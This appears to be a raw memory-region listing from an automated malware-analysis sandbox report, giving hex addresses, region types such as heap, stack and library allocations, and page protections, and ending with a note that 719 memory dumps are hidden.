362000
heap
page read and write
2E72000
heap
page read and write
195000
trusted library allocation
page execute and read and write
560000
heap
page read and write
289000
trusted library allocation
page read and write
580000
heap
page read and write
30E000
stack
page read and write
4C0000
heap
page read and write
527000
heap
page read and write
3D8E000
stack
page read and write
290E000
stack
page read and write
777000
heap
page read and write
495000
heap
page read and write
1D0000
heap
page read and write
29B000
stack
page read and write
400000
system
page execute and read and write
28E5000
trusted library allocation
page read and write
2CF8000
heap
page read and write
4ECE000
stack
page read and write
480000
heap
page read and write
296000
stack
page read and write
805000
heap
page read and write
4ABE000
stack
page read and write
76F000
stack
page read and write
10000
heap
page read and write
2A5B000
heap
page read and write
110000
heap
page read and write
31E000
heap
page read and write
21C0000
heap
page read and write
6B9000
heap
page read and write
614000
heap
page read and write
29AF000
stack
page read and write
3D2E000
stack
page read and write
2C40000
heap
page read and write
5010000
heap
page read and write
920000
heap
page read and write
239F000
stack
page read and write
4260000
trusted library allocation
page read and write
29FC000
trusted library allocation
page read and write
107000
stack
page read and write
366000
heap
page read and write
4E9E000
stack
page read and write
192000
trusted library allocation
page read and write
698000
heap
page read and write
294C000
trusted library allocation
page read and write
5F3000
heap
page read and write
425C000
stack
page read and write
2CA4000
heap
page read and write
391F000
stack
page read and write
280000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
2D50000
heap
page read and write
2DE0000
heap
page read and write
4260000
trusted library allocation
page read and write
8E0000
heap
page read and write
326E000
stack
page read and write
690000
heap
page read and write
29E4000
trusted library allocation
page read and write
D0F000
stack
page read and write
1D5000
trusted library allocation
page execute and read and write
261E000
stack
page read and write
1CB000
stack
page read and write
95D000
heap
page read and write
1F8E000
stack
page read and write
25EE000
stack
page read and write
6C2000
heap
page read and write
283000
trusted library allocation
page read and write
2D43000
heap
page read and write
4B9D000
stack
page read and write
9BE000
stack
page read and write
170000
trusted library allocation
page read and write
250000
heap
page read and write
222E000
stack
page read and write
970000
trusted library allocation
page read and write
2D30000
heap
page read and write
AE0000
heap
page read and write
4260000
trusted library allocation
page read and write
604E000
stack
page read and write
3790000
trusted library allocation
page read and write
2A40000
trusted library allocation
page read and write
370F000
stack
page read and write
4260000
trusted library allocation
page read and write
2D43000
heap
page read and write
2CE0000
heap
page read and write
2A19000
trusted library allocation
page read and write
7E0000
heap
page read and write
28D9000
trusted library allocation
page read and write
59C000
stack
page read and write
29D8000
trusted library allocation
page read and write
52FE000
stack
page read and write
51A0000
heap
page read and write
2CF4000
heap
page read and write
EF0000
trusted library allocation
page read and write
3F30000
heap
page read and write
248000
trusted library allocation
page read and write
106000
heap
page read and write
7AC000
heap
page read and write
2452000
heap
page read and write
240000
trusted library allocation
page execute and read and write
628E000
stack
page read and write
5F0000
heap
page read and write
8C0000
trusted library allocation
page read and write
1090000
heap
page execute and read and write
4CE1000
heap
page read and write
638000
heap
page read and write
4AFE000
stack
page read and write
26000
heap
page read and write
D0000
heap
page read and write
150000
trusted library allocation
page read and write
591000
heap
page read and write
10000
heap
page read and write
2E6E000
stack
page read and write
45D000
system
page execute and read and write
402D000
stack
page read and write
2CBD000
heap
page read and write
5F7000
heap
page read and write
2DF5000
trusted library allocation
page read and write
440000
heap
page execute and read and write
372D000
heap
page read and write
6B9000
heap
page read and write
847000
heap
page read and write
2E58000
heap
page read and write
3820000
heap
page read and write
2E6F000
heap
page read and write
4CC0000
heap
page read and write
F80000
trusted library allocation
page execute and read and write
260E000
stack
page read and write
800000
heap
page read and write
4A6E000
stack
page read and write
27CE000
stack
page read and write
538E000
stack
page read and write
389C000
stack
page read and write
4B0A000
stack
page read and write
18C000
stack
page read and write
2D0F000
heap
page read and write
5ECE000
stack
page read and write
240000
trusted library allocation
page read and write
4B8E000
stack
page read and write | page guard
2A1E000
stack
page read and write
D10000
trusted library allocation
page read and write
2FA000
heap
page read and write
41B000
system
page execute and read and write
CF0000
trusted library allocation
page read and write
3E0000
heap
page read and write
C80000
heap
page read and write
581000
heap
page read and write
1A0000
heap
page read and write
750000
heap
page read and write
7A0000
heap
page read and write
28EC000
trusted library allocation
page read and write
33CF000
stack
page read and write
ABE000
heap
page read and write
CA0000
trusted library allocation
page read and write
49FE000
stack
page read and write
4120000
heap
page read and write
5E5000
heap
page read and write
C0E000
stack
page read and write
55C000
stack
page read and write
EA0000
trusted library allocation
page read and write
576000
heap
page read and write
3A0000
heap
page read and write
297A000
trusted library allocation
page read and write
776000
heap
page read and write
24EE000
stack
page read and write
130000
heap
page read and write
2E6F000
heap
page read and write
48B000
heap
page read and write
E1E000
stack
page read and write
292C000
trusted library allocation
page read and write
2D2B000
heap
page read and write
620000
heap
page read and write
2E58000
heap
page read and write
310000
heap
page read and write
1B0000
heap
page read and write
7E3000
heap
page read and write
1D0000
trusted library allocation
page read and write
390000
trusted library allocation
page read and write
2913000
trusted library allocation
page read and write
197000
trusted library allocation
page execute and read and write
1B0000
trusted library allocation
page read and write
2641000
trusted library allocation
page read and write
6BF000
heap
page read and write
6C3000
heap
page read and write
560000
heap
page read and write
10000
heap
page read and write
34C000
stack
page read and write
BDD000
stack
page read and write
53DD000
stack
page read and write
3E8F000
stack
page read and write
283F000
stack
page read and write
164000
trusted library allocation
page read and write
2CED000
heap
page read and write
5A7000
heap
page read and write
123000
trusted library allocation
page execute and read and write
620000
heap
page read and write
29F8000
trusted library allocation
page read and write
4D50000
heap
page read and write
4D50000
heap
page read and write
290F000
stack
page read and write
430000
heap
page read and write
AA0000
heap
page read and write
108E000
stack
page read and write
170000
heap
page read and write
10000
heap
page read and write
819000
heap
page read and write
2D3E000
stack
page read and write
10000
heap
page read and write
2DA000
heap
page read and write
2C10000
heap
page read and write
88F000
heap
page read and write
EEB000
stack
page read and write
640000
heap
page read and write
29D4000
trusted library allocation
page read and write
CFE000
stack
page read and write
2A13000
trusted library allocation
page read and write
810000
trusted library allocation
page read and write
31DD000
stack
page read and write
679000
heap
page read and write
5BE000
stack
page read and write
61F000
heap
page read and write
459000
heap
page read and write
2CAB000
heap
page read and write
20EF000
stack
page read and write
5A0000
heap
page read and write
283A000
trusted library allocation
page read and write
7C5000
heap
page read and write
31A000
heap
page read and write
84F000
stack
page read and write
23D4000
heap
page read and write
320000
heap
page read and write
5E6000
heap
page read and write
4A34000
heap
page read and write
267D000
trusted library allocation
page read and write
866000
heap
page read and write
2CD8000
heap
page read and write
5E5000
heap
page read and write
300000
heap
page read and write
900000
trusted library allocation
page read and write
2A4E000
unkown
page read and write
95E000
stack
page read and write | page guard
340000
heap
page read and write
28C000
stack
page read and write
2E3C000
heap
page read and write
520000
heap
page read and write
2A04000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
138000
heap
page read and write
2CFB000
heap
page read and write
26CB000
trusted library allocation
page read and write
11AF000
stack
page read and write
5BE000
stack
page read and write
2E47000
heap
page read and write
5A8000
heap
page read and write
419000
trusted library allocation
page read and write
FBE000
stack
page read and write
87B000
heap
page read and write
420000
trusted library allocation
page execute and read and write
2C8C000
stack
page read and write
473000
system
page execute and read and write
2E58000
heap
page read and write
4A30000
heap
page read and write
10000
heap
page read and write
400000
system
page execute and read and write
289B000
trusted library allocation
page read and write
F6F000
stack
page read and write
534E000
stack
page read and write
34D0000
trusted library allocation
page read and write
710000
heap
page read and write
34D0000
trusted library allocation
page read and write
459000
system
page execute and read and write
59F000
heap
page read and write
260000
heap
page read and write
22BE000
stack
page read and write
400000
heap
page read and write
2E4B000
heap
page read and write
530000
heap
page read and write
2E4D000
heap
page read and write
110000
trusted library allocation
page read and write
5E4E000
stack
page read and write
A90000
heap
page read and write
770000
heap
page read and write
2CE5000
heap
page read and write
2E72000
heap
page read and write
2CC0000
heap
page read and write
21E2000
heap
page read and write
5E6000
heap
page read and write
5200000
heap
page read and write
5E7D000
stack
page read and write
2B82000
heap
page read and write
23F2000
heap
page read and write
3C8D000
stack
page read and write
E90000
trusted library allocation
page read and write
23FF000
stack
page read and write
2EE000
stack
page read and write
28A5000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
717000
heap
page read and write
2BAE000
stack
page read and write
400000
system
page execute and read and write
3669000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
5DF000
heap
page read and write
4A0E000
stack
page read and write
18C000
stack
page read and write
89000
stack
page read and write
480000
heap
page read and write
4260000
trusted library allocation
page read and write
8F0000
trusted library allocation
page read and write
696000
heap
page read and write
10000
heap
page read and write
47E000
stack
page read and write
C88000
heap
page read and write
2E44000
heap
page read and write
570000
heap
page read and write
66C000
heap
page read and write
10001000
direct allocation
page execute and read and write
D7E000
stack
page read and write
28AD000
stack
page read and write
250000
heap
page read and write
2C7000
heap
page read and write
E8F000
stack
page read and write
10E000
heap
page read and write
280E000
stack
page read and write
1FDD000
stack
page read and write
4BE000
stack
page read and write
5F3E000
stack
page read and write
D00000
trusted library allocation
page read and write
3DC000
stack
page read and write
B6E000
stack
page read and write
17F000
heap
page read and write
3D30000
heap
page read and write
37C000
stack
page read and write
292A000
trusted library allocation
page read and write
53EF000
stack
page read and write
280000
heap
page read and write
7EC000
stack
page read and write
5EF000
heap
page read and write
124000
trusted library allocation
page read and write
4CC4000
heap
page read and write
980000
heap
page read and write
270000
trusted library allocation
page read and write
2D37000
heap
page read and write
2C7E000
stack
page read and write
3A0000
heap
page read and write
820000
trusted library allocation
page read and write
3649000
trusted library allocation
page read and write
2E3B000
heap
page read and write
F00000
trusted library allocation
page execute and read and write
20000
heap
page read and write
38DE000
stack
page read and write
66B000
heap
page read and write
283F000
stack
page read and write
2CBE000
heap
page read and write
2800000
trusted library allocation
page read and write
2CA0000
heap
page read and write
20000
heap
page read and write
4260000
trusted library allocation
page read and write
278F000
stack
page read and write
2E6F000
heap
page read and write
C74000
heap
page read and write
627000
heap
page read and write
374F000
heap
page read and write
12D000
trusted library allocation
page execute and read and write
470000
heap
page read and write
FF0000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
2CCD000
heap
page read and write
34D0000
trusted library allocation
page read and write
24DF000
stack
page read and write
2919000
trusted library allocation
page read and write
D60000
heap
page read and write
2E54000
heap
page read and write
4D4E000
stack
page read and write
4260000
trusted library allocation
page read and write
1A7000
stack
page read and write
2F0000
heap
page read and write
AC9000
heap
page read and write
2DD0000
heap
page read and write
840000
heap
page read and write
39E000
stack
page read and write
3651000
trusted library allocation
page read and write
2A0000
heap
page read and write
10000
heap
page read and write
8E0000
trusted library allocation
page read and write
240000
heap
page read and write
2BDE000
stack
page read and write
2D50000
heap
page read and write
6080000
heap
page read and write
496E000
stack
page read and write
17A000
trusted library allocation
page read and write
50D000
stack
page read and write
28B3000
trusted library allocation
page read and write
51C000
stack
page read and write
C0E000
stack
page read and write
260000
trusted library allocation
page execute and read and write
410000
trusted library allocation
page read and write
2E48000
heap
page read and write
8B0000
heap
page read and write
2A90000
heap
page read and write
2AF000
stack
page read and write
E7D000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
B20000
heap
page read and write
69F000
heap
page read and write
520000
heap
page read and write
4260000
trusted library allocation
page read and write
CB0000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
2CE8000
heap
page read and write
4C8E000
stack
page read and write
10000
heap
page read and write
33E000
stack
page read and write
88C000
stack
page read and write
16C000
stack
page read and write
3754000
heap
page read and write
577000
heap
page read and write
4BDE000
stack
page read and write
45C000
system
page execute and read and write
4B3E000
stack
page read and write
3DE000
stack
page read and write
478000
remote allocation
page execute and read and write
C9D000
stack
page read and write
3A8F000
stack
page read and write
27DE000
stack
page read and write
6390000
heap
page read and write
295000
heap
page read and write
45A000
system
page execute and read and write
350000
heap
page read and write
5DF000
heap
page read and write
960000
trusted library allocation
page read and write
582000
heap
page read and write
4B8F000
stack
page read and write
8D0000
trusted library allocation
page read and write
5040000
heap
page read and write
1BA000
trusted library allocation
page read and write
5E8000
heap
page read and write
37A2000
trusted library allocation
page read and write
2C9F000
stack
page read and write
3D7000
stack
page read and write
1EA0000
direct allocation
page read and write
16D000
trusted library allocation
page execute and read and write
D29000
heap
page read and write
2D4C000
heap
page read and write
44E000
heap
page read and write
4FB0000
heap
page read and write
4260000
trusted library allocation
page read and write
2847000
trusted library allocation
page read and write
2BEE000
stack
page read and write
There are 719 hidden memdumps, click here to show them.